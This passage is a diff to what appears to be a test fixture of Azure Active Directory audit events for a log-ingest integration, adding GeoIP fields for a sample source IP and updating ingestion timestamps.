APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -2419,6 +2575,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -2585,7 +2753,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124905900Z", + "ingested": "2021-12-14T14:48:43.176643610Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -2612,6 +2780,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -2778,7 +2958,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124912500Z", + "ingested": "2021-12-14T14:48:43.176644293Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -2805,6 +2985,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -2971,7 +3163,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124918900Z", + "ingested": "2021-12-14T14:48:43.176645139Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -2998,6 +3190,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -3164,7 +3368,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124925700Z", + "ingested": "2021-12-14T14:48:43.176645932Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
